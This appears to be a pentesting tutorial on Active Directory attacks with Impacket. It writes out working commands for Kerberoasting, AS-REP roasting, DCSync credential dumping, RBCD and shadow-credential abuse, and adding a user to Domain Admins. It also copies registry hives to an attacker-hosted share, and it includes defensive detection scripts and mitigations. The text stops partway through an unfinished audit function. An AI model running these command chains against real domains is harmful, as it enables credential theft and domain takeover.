Red Teaming

Active Directory Penetration Testing Using Impacket

Impacket is a powerful Python toolkit for working with network protocols, particularly useful in Active Directory (AD) penetration testing. It provides various scripts to exploit common AD vulnerabilities, perform lateral movement, and extract sensitive data. This article demonstrates practical AD pentesting techniques using Impacket, covering enumeration, exploitation, and post exploitation.

Table of Contents

Introduction to Impacket

Enumeration

  • Enumerate SIDs
  • Enumerating AD Users
  • Enumerating AD Computers

Resource-Based Constrained Delegation (RBCD) Attack

Kerberos-Based Attacks

  • AS-REP Roasting
  • Kerberoasting

Credential Dumping

  • DCSync Attack
  • Local Administrator Password Solution (LAPS) Extraction
  • GMSA Attack

Abusing AD-DACL

  • ForceChangePassword
  • WriteDacl & WriteOwner

Overpass-the-Hash

Shadow Credentials Attack

Extracting Credentials from Registry Hive

Mitigation

Conclusion

Introduction to Impacket

Impacket is a versatile Python-based toolkit widely used in both penetration testing and malicious hacking efforts. For penetration testers, Impacket facilitates the simulation of realistic attack scenarios, allowing for identification and remediation of vulnerabilities within an organization’s network. Adversaries often use Impacket to exploit Windows services and protocols, move laterally within networks, escalate privileges, and access sensitive data. Impacket is a favored tool for threat actors including ransomware groups due to its comprehensive suite of capabilities for reconnaissance, credential dumping, and unauthorized command execution.

Enumeration

Enumeration is the first step in AD pentesting to gather information about users, computers, and other AD objects.

Enumerate SIDs

Impacket’s lookupsid allows you to enumerate user SIDs (Security Identifiers) and group SIDs on a Windows system. Each user account and group account on a Windows system has a unique SID. By obtaining the SIDs, you can gather information about existing user accounts, which can be valuable in understanding the network’s structure and potential attack vectors. 

impacket-lookupsid ignite.local/krishna:Password@1@192.168.1.14

Enumerate AD Users

Impacket’s GetADUsers script queries Active Directory users over LDAP with the supplied credentials. It can return attributes such as the username, the description (which sometimes holds interesting information), the last logon time, the time the password was last set, and more.

impacket-GetADUsers ignite.local/Administrator:Ignite@987 -dc-ip 192.168.1.14 -all

Retrieves all AD users along with their attributes (e.g., last logon, description).

Enumerate AD Computers

Lists all computer objects in the domain.

impacket-GetADComputers ignite.local/aarti:Password@1 -dc-ip 192.168.1.14

Resource-Based Constrained Delegation (RBCD) Attack

Resource-Based Constrained Delegation (RBCD) is a security feature in Active Directory (AD) that allows a computer object to specify which users or machines can impersonate accounts to access its resources. This delegation method provides more granular control compared to older unconstrained and constrained delegation methods. However, attackers can exploit misconfigured RBCD to gain unauthorized access and escalate privileges within a domain.

The following steps outline the process:

  • Create a fake computer account
  • Edit the target’s “rbcd” attribute by delegating control on a domain controller (DC) to this fake machine
  • Fake computer account acts on behalf of Domain Controller (DC$) account
  • Obtain a ticket (delegation operation)
  • Once the ticket is obtained, it can be used with pass-the-ticket.

Abuse MachineAccountQuota to create a computer account

Since Active Directory allows users to create machine accounts (if MachineAccountQuota > 0), we leverage this to create a new fake machine using the Geet account.

To do this, we’ll use the addcomputer script. Its SAMR method adds a new computer account over SMB.

impacket-addcomputer ignite.local/geet:Password@1 -computer-name fakepc -computer-pass Password@123 -dc-ip 192.168.1.14

Rewrite DC’s AllowedToActOnBehalfOfOtherIdentity properties

We will configure msDS-AllowedToActOnBehalfOfOtherIdentity on the domain controller (DC$), allowing our fake machine account to impersonate users.

We can use Impacket’s rbcd script to read, write, or clear delegation rights. Make sure you use credentials of a domain user who has the appropriate permissions.

impacket-rbcd ignite.local/geet:Password@1 -action write -delegate-to 'DC$' -delegate-from 'fakepc$' -dc-ip 192.168.1.14

Generate a Service Ticket for CIFS

The fake machine account first requests a Kerberos service ticket to itself on behalf of a privileged user (e.g., Administrator) using Service for User to Self (S4U2Self).

It then uses Service for User to Proxy (S4U2Proxy), together with the delegation rights written above, to obtain a service ticket for DC$ as that user.

Once you modify the delegation attribute, you can use the Impacket getST script to obtain a Service Ticket (ST) for impersonation. For instance, you may impersonate the Administrator or any other user within the domain.

impacket-getST ignite.local/'fakepc$':Password@123 -spn cifs/DC.ignite.local -impersonate administrator -dc-ip 192.168.1.14

Obtain Privileged Access

After you obtain the Kerberos ticket, you can use it with pass-the-ticket techniques.

In order to use the ticket, first export an environment variable that points to the created ticket.

export KRB5CCNAME=administrator@cifs_DC.ignite.local@IGNITE.LOCAL.ccache

Use impacket’s psexec for the remote code execution using pass-the-ticket method.

impacket-psexec ignite.local/administrator@DC.ignite.local -k -no-pass -dc-ip 192.168.1.14

Kerberos-Based Attacks

Kerberos is a common target for AD attacks due to misconfigurations and weak credentials.

AS-REP Roasting

AS-REP Roasting is an attack targeting the Kerberos authentication protocol. It exploits accounts where Kerberos pre-authentication is disabled, allowing attackers to crack those accounts’ passwords offline.

How the Attack Works:

  1. Request a Ticket: The attacker sends a request to the Key Distribution Center (KDC) for an account with pre-authentication disabled.
  2. Receive Encrypted Data: The KDC sends back an AS-REP response, encrypted using the account’s password hash.
  3. Crack the Password: The attacker uses tools to brute force the password offline. If the password is weak, they gain access.

The GetNPUsers script within Impacket can be used to perform AS-REP Roasting attacks and retrieve password hashes.

impacket-GetNPUsers -dc-ip 192.168.1.14 ignite.local/ -usersfile users.txt -format john -outputfile hashes

John the Ripper with a wordlist such as rockyou can then recover the password from the captured hash offline.

john -w=/usr/share/wordlists/rockyou.txt hashes


Kerberoasting

Kerberoasting is a technique in which an attacker requests a KRB_TGS service ticket for an SPN. Because that ticket is encrypted with the service account’s key (often RC4), it can be brute-forced offline to recover the service account’s password.

Impacket’s GetUserSPNs script will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with John the Ripper and HashCat.

impacket-GetUserSPNs -request -dc-ip 192.168.1.14 ignite.local/shivam:Password@1 -outputfile hashes

John the Ripper with a wordlist such as rockyou can then recover the service account password from the captured hash offline.

john -w=/usr/share/wordlists/rockyou.txt hashes
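Both roasting techniques leave traces on the domain controller: a TGT issued without pre-authentication is logged as Event 4768 with PreAuthType 0, and a Kerberoasting run typically produces a burst of Event 4769 service-ticket requests with RC4 encryption (0x17) for SPNs tied to user accounts. The following detection logic is an added example written for this article, not Impacket code; the event records are constructed sample data and the field names follow the Windows Security log EventData names.

```python
"""Detect AS-REP Roasting and Kerberoasting precursors in Windows Security
events 4768 (TGT request) and 4769 (service ticket request).

Added example for this article, not part of Impacket. SAMPLE_EVENTS below is
constructed data; field names mirror the Windows Security log's EventData
(TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress).
"""

# Constructed sample events (not real logs). TicketEncryptionType values are
# the codes Windows writes: 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96.
SAMPLE_EVENTS = [
    # 4768 with PreAuthType 0: the KDC returned an AS-REP without pre-auth,
    # i.e. the account is AS-REP roastable and someone just asked for it.
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.1.50", "Status": "0x0"},
    # Normal interactive logon with pre-authentication (PreAuthType 2).
    {"EventID": 4768, "TargetUserName": "krishna", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.1.20", "Status": "0x0"},
    # Several RC4 service tickets for user-account SPNs from one host: the
    # pattern GetUserSPNs -request produces.
    {"EventID": 4769, "TargetUserName": "shivam@IGNITE.LOCAL", "ServiceName": "mssql_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.1.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "shivam@IGNITE.LOCAL", "ServiceName": "http_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.1.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "shivam@IGNITE.LOCAL", "ServiceName": "ldap_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "192.168.1.50", "Status": "0x0"},
    # Benign: AES tickets for a computer account and for the KDC itself.
    {"EventID": 4769, "TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.1.20", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "aarti@IGNITE.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "192.168.1.20", "Status": "0x0"},
]

# RC4-HMAC and RC4-HMAC-EXP encryption type codes as logged in 4769.
RC4_ETYPES = {"0x17", "0x18"}


def asrep_roast_candidates(events):
    """Return (account, source_ip) for every successful 4768 whose PreAuthType
    is 0: the account has pre-authentication disabled and its AS-REP was
    handed out to the requester, which is exactly what GetNPUsers collects."""
    hits = []
    for e in events:
        if e["EventID"] != 4768 or e.get("Status") != "0x0":
            continue
        if e.get("PreAuthType") == "0":
            hits.append((e["TargetUserName"], e["IpAddress"]))
    return hits


def kerberoast_sources(events, threshold=3):
    """Return {source_ip: set_of_spns} for hosts that obtained at least
    `threshold` RC4-encrypted service tickets for SPNs on user accounts.

    Computer accounts (names ending in '$') and krbtgt are skipped because
    their keys are long and random, so tickets for them are not crackable."""
    per_source = {}
    for e in events:
        if e["EventID"] != 4769 or e.get("Status") != "0x0":
            continue
        service = e["ServiceName"]
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        if e["TicketEncryptionType"].lower() not in RC4_ETYPES:
            continue
        per_source.setdefault(e["IpAddress"], set()).add(service)
    return {ip: spns for ip, spns in per_source.items() if len(spns) >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable requests:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("Kerberoasting sources:", kerberoast_sources(SAMPLE_EVENTS))
```

The threshold is deliberately a parameter: a single RC4 service ticket for a user SPN is normal on domains that still allow RC4, while several distinct SPNs from one client in a short window is the roasting signature. Removing the RC4 precondition altogether is the durable fix, which is why the audit in the Mitigations section checks msDS-SupportedEncryptionTypes.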


Credential Dumping

DCSync Attack

A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.

Impacket’s secretsdump script uses several techniques to dump secrets from a remote machine without deploying an agent: reading SAM and LSA secrets from the registry, dumping NTLM hashes, plaintext credentials and Kerberos keys, and dumping NTDS.dit (via DCSync when run against a domain controller).

impacket-secretsdump ignite.local/komal:Password@1@192.168.1.14
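A DCSync is visible on the domain controller as Event 4662 (an operation was performed on an object) in which the Properties field lists the replication control-access rights and the requesting account is not another domain controller. The detector below is an added example for this article, not Impacket code; the 4662 records are constructed, and the replication rights GUIDs are the schema values for DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set.

```python
"""Flag DCSync-style replication requests in Windows Security Event 4662.

Added example for this article, not part of Impacket. SAMPLE_4662 is
constructed data shaped like the event's EventData fields. Detecting this
requires "Audit Directory Service Access" and a SACL on the domain object.
"""
import re

# Control-access-right GUIDs from the AD schema that grant replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(
    r"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})", re.I)

# Constructed sample events. The Properties field of a real 4662 lists the
# access type followed by the GUIDs of the rights exercised, one per line.
SAMPLE_4662 = [
    # Routine replication between two domain controllers: expected.
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "ObjectName": "DC=ignite,DC=local",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising replication rights on the domain object:
    # this is what secretsdump's DCSync looks like from the DC's side.
    {"EventID": 4662, "SubjectUserName": "komal", "AccessMask": "0x100",
     "ObjectName": "DC=ignite,DC=local",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A 4662 that touches a user object with no replication rights: ignore.
    {"EventID": 4662, "SubjectUserName": "aarti", "AccessMask": "0x10",
     "ObjectName": "CN=aarti,CN=Users,DC=ignite,DC=local",
     "Properties": "%%7688\n{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_in(properties):
    """Map every replication GUID found in a 4662 Properties field to its name."""
    found = set()
    for guid in GUID_RE.findall(properties or ""):
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name:
            found.add(name)
    return found


def dcsync_suspects(events, domain_controllers):
    """Return one alert per 4662 in which a non-DC principal exercised
    replication rights. DS-Replication-Get-Changes-All is the right that
    exposes secrets, so it is marked as the high-severity case."""
    dcs = {dc.lower() for dc in domain_controllers}
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights_in(e.get("Properties"))
        if not rights:
            continue
        subject = e["SubjectUserName"]
        if subject.lower() in dcs:
            continue  # DC-to-DC replication is the normal use of these rights
        alerts.append({
            "subject": subject,
            "object": e.get("ObjectName"),
            "rights": sorted(rights),
            "severity": "high" if "DS-Replication-Get-Changes-All" in rights else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in dcsync_suspects(SAMPLE_4662, domain_controllers=["DC$", "DC02$"]):
        print(alert)
```

The allowlist is a list of domain controller computer accounts rather than a group lookup so the check stays self-contained; in production the set would be derived from the Domain Controllers OU, and any Azure AD Connect or backup service accounts that legitimately hold replication rights would be added to it explicitly after review.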

Local Administrator Password Solution (LAPS) Extraction

LAPS (Local Administrator Password Solution) is a Microsoft solution that randomizes and stores local administrator passwords.

If LAPS is deployed and the account used has read access to the stored password attribute, GetLAPSPassword retrieves the local administrator passwords.

impacket-GetLAPSPassword ignite.local/aarti:Password@1 -dc-ip 192.168.1.14


GMSA Attack

Service accounts’ passwords are commonly not regularly rotated, putting them at risk, especially because they can be targeted through Kerberoasting attacks. 

ReadGMSAPassword Attack is a technique where attackers abuse misconfigured Group Managed Service Accounts (gMSA) to retrieve their passwords.

In Active Directory, administrators should only grant ReadGMSAPassword to specific systems. However, if they misconfigure these permissions, an attacker with access to a machine that can query the gMSA password can extract it and use it to authenticate as that service account. 

impacket-secretsdump ignite.local/komal:Password@1@192.168.1.14 | grep GMSA

Abusing AD-DACL

ForceChangePassword

ForceChangePassword permission grants the right to change the password of a user account without knowing their current password. Consequently, attackers can use this access to perform unauthorized actions.

Impacket’s changepasswd script can reset a user’s password over SMB (SAMR) without knowing the current one: the -reset option performs an administrative reset using the credentials of an account that holds the right over the target.

impacket-changepasswd ignite.local/panther@192.168.1.14 -newpass Password@1234 -altuser ignite.local/suri -altpass Password@1 -reset


Impacket’s changepasswd can also change the current user’s own password when the current password is known.

impacket-changepasswd ignite.local/komal@192.168.1.14 -newpass 'Password@987' -p rpc-samr

WriteDacl & WriteOwner

Granting Ownership

The WriteOwner permission allows a user to change the ownership of an object to a different user or principal, including one controlled by an attacker. Consequently, an attacker can exploit this permission to take ownership of a target object.

The tool owneredit allows changing ownership of a directory object.

impacket-owneredit -action write -new-owner 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.14


Granting Control

The WriteDacl permission in Active Directory allows a user to modify the Discretionary Access Control List (DACL) of an AD object, which gives them control over object-level permissions.

This can be done with Impacket’s dacledit script.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.14


The tester can abuse these permissions by adding the aaru user to the Domain Admins group and then listing the group’s members to confirm that aaru is now a Domain Admin.

bloodyAD --host "192.168.1.14" -d "ignite.local" -u "aaru" -p "Password@1" add groupMember "Domain Admins" "aaru"


Impacket’s psexec is another widely used post-exploitation tool for remote command execution. After adding the aaru user to the Domain Admins group, the attacker or tester can use psexec for remote command execution.

impacket-psexec aaru:Password@1@ignite.local -dc-ip 192.168.1.14
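Both abuses in this section produce distinctive domain controller events: an administrative password reset of another account is Event 4724 (a user changing their own password is 4723 instead), and a member being added to a global group such as Domain Admins is Event 4728 (4732 and 4756 for local and universal groups). The detection below is an added example for this article, not Impacket or bloodyAD code; the events are constructed and the helpdesk allowlist is a hypothetical one.

```python
"""Detect ForceChangePassword-style resets (Event 4724) and additions to
privileged groups (Events 4728/4732/4756) in Windows Security events.

Added example for this article; not part of Impacket. SAMPLE_EVENTS is
constructed data shaped like the EventData fields of those events.
"""

# Group-membership "member added" events: global, local and universal groups.
GROUP_ADD_EVENTS = {4728, 4732, 4756}

# Groups whose membership changes should always be reviewed.
PRIVILEGED_GROUPS = {
    "domain admins", "enterprise admins", "schema admins", "administrators",
    "account operators", "backup operators", "server operators",
}

SAMPLE_EVENTS = [
    # suri resets panther's password: the changepasswd -reset case above.
    {"EventID": 4724, "SubjectUserName": "suri", "TargetUserName": "panther"},
    # komal changes their own password with the current one known (4723).
    {"EventID": 4723, "SubjectUserName": "komal", "TargetUserName": "komal"},
    # A helpdesk account doing its job: allowlisted below.
    {"EventID": 4724, "SubjectUserName": "helpdesk1", "TargetUserName": "aarti"},
    # aaru adds aaru to Domain Admins: the WriteDacl/WriteMembers abuse above.
    {"EventID": 4728, "SubjectUserName": "aaru",
     "MemberName": "CN=aaru,CN=Users,DC=ignite,DC=local", "TargetUserName": "Domain Admins"},
    # Routine addition to a non-privileged group.
    {"EventID": 4728, "SubjectUserName": "Administrator",
     "MemberName": "CN=aarti,CN=Users,DC=ignite,DC=local", "TargetUserName": "Marketing"},
    # An admin adding someone else to Domain Admins: still worth a review.
    {"EventID": 4728, "SubjectUserName": "Administrator",
     "MemberName": "CN=bob,CN=Users,DC=ignite,DC=local", "TargetUserName": "Domain Admins"},
]


def _cn_of(distinguished_name):
    """Extract the CN value from an LDAP DN such as 'CN=aaru,CN=Users,...'."""
    first = distinguished_name.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def password_reset_alerts(events, approved_resetters=()):
    """Return (subject, target) for every 4724 where someone reset another
    account's password and is not an approved helpdesk/admin identity."""
    approved = {a.lower() for a in approved_resetters}
    alerts = []
    for e in events:
        if e["EventID"] != 4724:
            continue
        subject, target = e["SubjectUserName"], e["TargetUserName"]
        if subject.lower() == target.lower() or subject.lower() in approved:
            continue
        alerts.append((subject, target))
    return alerts


def privileged_group_additions(events):
    """Return one record per addition to a privileged group. self_add marks
    the strongest indicator: the actor added their own account."""
    alerts = []
    for e in events:
        if e["EventID"] not in GROUP_ADD_EVENTS:
            continue
        group = e["TargetUserName"]
        if group.lower() not in PRIVILEGED_GROUPS:
            continue
        member = _cn_of(e["MemberName"])
        alerts.append({
            "subject": e["SubjectUserName"],
            "member": member,
            "group": group,
            "self_add": member.lower() == e["SubjectUserName"].lower(),
        })
    return alerts


if __name__ == "__main__":
    print(password_reset_alerts(SAMPLE_EVENTS, approved_resetters=["helpdesk1"]))
    for record in privileged_group_additions(SAMPLE_EVENTS):
        print(record)
```

Pairing the two signals matters: a reset of a privileged account's password followed within minutes by a group addition performed by that same account is the sequence the DACL abuse above produces, and it is far rarer in normal operations than either event on its own.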

Overpass-the-Hash

Overpass-the-Hash combines pass-the-hash with pass-the-ticket, which is where the name comes from. It creates Kerberos tickets from an NTLM hash or AES key, which then grant access to services that require Kerberos authentication.

Impacket’s getTGT script takes a password, NTLM hash or AES key, requests a TGT, and saves it as a ccache file.

impacket-getTGT -dc-ip 192.168.1.14 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator

The above command requests a Kerberos TGT and stores it as a ccache; the following commands point Impacket at that ccache and use the ticket to access the resource.

export KRB5CCNAME=Administrator.ccache
impacket-psexec ignite.local/administrator@DC.ignite.local -k -no-pass -dc-ip 192.168.1.14


Inspecting the Ticket

The TGT obtained above can be inspected with describeTicket, which parses a ccache and prints its contents, such as the client principal, the service, the encryption type and the validity period.

impacket-describeTicket Administrator.ccache


This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket, and vice versa

impacket-ticketConverter Administrator.ccache admin.kirbi

Shadow Credentials Attack

The Shadow Credentials attack takes advantage of improper permissions on the msDS-KeyCredentialLink attribute, allowing attackers to inject their own public key into the attribute of a target user or computer account. Once this is done, they can impersonate the target account using PKINIT.

Here is how the attack works step by step:

  • Identify Target Permissions
  • Inject the Attacker’s Public Key
  • Generate a Certificate
  • Authenticate as the Target Account
  • Impersonate Users or Escalate Privileges

You can set shadow credentials on the computer object using impacket’s ntlmrelayx.

We will launch ntlmrelayx with the --shadow-credentials option and the --shadow-target parameter set to the name of the computer account that we are expecting to relay (in this case, DC$).

impacket-ntlmrelayx -t ldap://192.168.1.14 --shadow-credentials --shadow-target 'dc$'


Trigger a callback to the relay listener via a browser, using the krishna user’s credentials.

After a brief wait, we receive an HTTP connection from the DC$ computer account along with its NTLM credentials. These credentials are then relayed to the LDAP service on the domain controller and the msDS-KeyCredentialLink attribute of the relayed computer account is updated.


Use Certificate to Dump NTDS

nxc smb 192.168.1.14 --pfx-cert FZn7B2sQ.pfx --pfx-pass 05FY014jsNhqqL1IbDhr -u DC$ --ntds --user administrator
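The RBCD attack, the Shadow Credentials attack and the WriteDacl/WriteOwner abuse described earlier all come down to a write to one sensitive attribute on a directory object: msDS-AllowedToActOnBehalfOfOtherIdentity, msDS-KeyCredentialLink and nTSecurityDescriptor respectively, and the MachineAccountQuota step adds a computer account. With "Audit Directory Service Changes" enabled and a SACL on the objects, each write is logged as Event 5136 and each account creation as Event 4741. The monitor below is an added example for this article covering all of those sections; it is not Impacket code, its events are constructed, and the approved-admin allowlist is hypothetical.

```python
"""Flag writes to the directory attributes abused by RBCD, Shadow Credentials
and WriteDacl/WriteOwner (Event 5136), and computer-account creation by
ordinary users (Event 4741, the MachineAccountQuota path).

Added example for this article; not part of Impacket. SAMPLE_DS_EVENTS is
constructed data shaped like the EventData fields of 5136 and 4741.
"""

# LDAP display names (lower-cased) of the attributes each technique writes.
WATCHED_ATTRIBUTES = {
    "msds-allowedtoactonbehalfofotheridentity": "RBCD: delegation rights rewritten",
    "msds-keycredentiallink": "Shadow credentials: key credential written",
    "ntsecuritydescriptor": "DACL/owner modified (WriteDacl/WriteOwner)",
}

# OperationType codes Windows writes in 5136.
OPERATION = {"%%14674": "value added", "%%14675": "value deleted"}

SAMPLE_DS_EVENTS = [
    # geet rewrites the DC's RBCD attribute (the impacket-rbcd step).
    {"EventID": 5136, "SubjectUserName": "geet",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=ignite,DC=local", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity", "OperationType": "%%14674"},
    # The relayed DC$ session writes a key credential onto its own object.
    {"EventID": 5136, "SubjectUserName": "DC$",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=ignite,DC=local", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    # An approved admin editing an ACL: allowlisted.
    {"EventID": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=ignite,DC=local", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    # aaru editing the Domain Admins DACL (the dacledit step).
    {"EventID": 5136, "SubjectUserName": "aaru",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=ignite,DC=local", "ObjectClass": "group",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    # An uninteresting attribute change.
    {"EventID": 5136, "SubjectUserName": "aarti",
     "ObjectDN": "CN=aarti,CN=Users,DC=ignite,DC=local", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    # A non-admin creating a computer account via MachineAccountQuota.
    {"EventID": 4741, "SubjectUserName": "geet", "TargetUserName": "fakepc$"},
    # An admin joining a real workstation.
    {"EventID": 4741, "SubjectUserName": "Administrator", "TargetUserName": "WS02$"},
]


def _cn_of(distinguished_name):
    """Return the CN value of an LDAP DN ('CN=DC,OU=...' -> 'DC')."""
    first = distinguished_name.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def sensitive_directory_changes(events, approved_admins=()):
    """Return alerts for 5136 writes to watched attributes and 4741 computer
    creations, excluding actors in approved_admins. self_write marks a
    principal modifying its own object, which is how a relayed DC$ session
    looks when it plants a shadow credential."""
    approved = {a.lower() for a in approved_admins}
    alerts = []
    for e in events:
        subject = e["SubjectUserName"]
        if subject.lower() in approved:
            continue
        if e["EventID"] == 5136:
            attr = e["AttributeLDAPDisplayName"]
            reason = WATCHED_ATTRIBUTES.get(attr.lower())
            if reason is None:
                continue
            target_cn = _cn_of(e["ObjectDN"])
            alerts.append({
                "event": 5136, "subject": subject, "target": e["ObjectDN"],
                "attribute": attr, "operation": OPERATION.get(e.get("OperationType"), "unknown"),
                "reason": reason,
                "self_write": subject.rstrip("$").lower() == target_cn.lower(),
            })
        elif e["EventID"] == 4741:
            alerts.append({
                "event": 4741, "subject": subject, "target": e["TargetUserName"],
                "attribute": None, "operation": "object created",
                "reason": "Computer account created by a non-admin (MachineAccountQuota)",
                "self_write": False,
            })
    return alerts


if __name__ == "__main__":
    for alert in sensitive_directory_changes(SAMPLE_DS_EVENTS, approved_admins=["Administrator"]):
        print(alert)
```

Value deletions are reported as well as additions because a clean-up of msDS-KeyCredentialLink or of the RBCD attribute after use is itself a useful indicator, and because a legitimate rewrite of the RBCD attribute appears as a delete followed by an add.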

Extracting Credentials from Registry Hive

Impacket’s reg script interacts remotely with the Windows Registry of a target machine over SMB using valid credentials, which is useful during post-exploitation, red teaming and lateral movement.

Key privileges that help:

  • SeBackupPrivilege: allows reading the SYSTEM, SAM and NTDS files even without full administrator rights.
  • Administrator (local or domain): can dump the registry, access files, and use tools such as secretsdump and reg.py.
  • RemoteRegistry service: must be running for reg.py to connect and dump.
  • SeDebugPrivilege (advanced): allows injecting into LSASS (used by Mimikatz), useful in custom attacks.

First, set up an SMB share on your attacker machine using the impacket-smbserver. This share will store the dumped registry files.

impacket-smbserver share $(pwd) -smb2support


Next, dump the SAM and SYSTEM hives from the target machine, using the impacket-reg tool.

impacket-reg ignite.local/aarav:Password@1@192.168.1.48 backup -o '\\192.168.1.16\share'


Finally, on the Kali Linux shell, use Impacket’s secretsdump to extract password hashes from the saved SAM, SYSTEM and SECURITY hives.

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local

This extracts the Administrator account hash. Evil-WinRM can then log in as Administrator using the extracted hash, achieving privilege escalation on the Windows domain controller.

evil-winrm -i 192.168.1.48 -u administrator -H 32196b56ffe6f45e294117b91a83bf38


Mitigations

  • Enforce Kerberos pre-authentication; do not leave accounts with pre-authentication disabled.
  • Restrict delegation rights (prefer constrained delegation; audit who can write the RBCD attribute).
  • Monitor for anomalous ticket requests (e.g., GetUserSPNs, DCSync).
  • Implement LAPS securely and restrict access.
  • Enable SMB signing to prevent relay attacks.
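Most of these mitigations can be verified directly from attribute values on the directory objects: the userAccountControl flag bits expose pre-authentication and delegation settings, servicePrincipalName on a user account is the Kerberoasting precondition, msDS-SupportedEncryptionTypes shows whether RC4 is still accepted, msDS-AllowedToActOnBehalfOfOtherIdentity shows configured RBCD, and ms-DS-MachineAccountQuota on the domain object controls computer-account creation. The audit below is an added example for this article, not Impacket code; the object records are constructed in the shape an LDAP query would return, and the flag and encryption-type bit values are the ones defined in the AD schema.

```python
"""Audit directory objects for the misconfigurations the Mitigations list
addresses. Added example for this article, not part of Impacket. The records
are constructed; a real run would feed it the results of an LDAP search.
"""

# userAccountControl flag bits (AD schema).
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000          # domain controllers
TRUSTED_FOR_DELEGATION = 0x80000       # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
DONT_REQ_PREAUTH = 0x400000            # AS-REP roastable

# msDS-SupportedEncryptionTypes bits. 0 (unset) means the default, which
# still includes RC4.
DES_ETYPES = 0x3
RC4_HMAC = 0x4
AES_ETYPES = 0x18

# Constructed sample objects (not real directory data).
SAMPLE_OBJECTS = [
    {"sAMAccountName": "svc_backup", "objectClass": "user",
     "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH, "servicePrincipalName": []},
    {"sAMAccountName": "mssql_svc", "objectClass": "user", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/sql01.ignite.local:1433"], "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "web_svc", "objectClass": "user", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": ["HTTP/web01.ignite.local"], "msDS-SupportedEncryptionTypes": AES_ETYPES},
    {"sAMAccountName": "DC$", "objectClass": "computer",
     "userAccountControl": SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "FS01$", "objectClass": "computer", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"<security descriptor bytes>"},
    {"sAMAccountName": "WS01$", "objectClass": "computer",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "aarti", "objectClass": "user", "userAccountControl": NORMAL_ACCOUNT,
     "servicePrincipalName": []},
]
SAMPLE_DOMAIN = {"distinguishedName": "DC=ignite,DC=local", "ms-DS-MachineAccountQuota": 10}


def audit_directory(objects, domain):
    """Return (object, finding, detail) tuples for every weakness found."""
    findings = []
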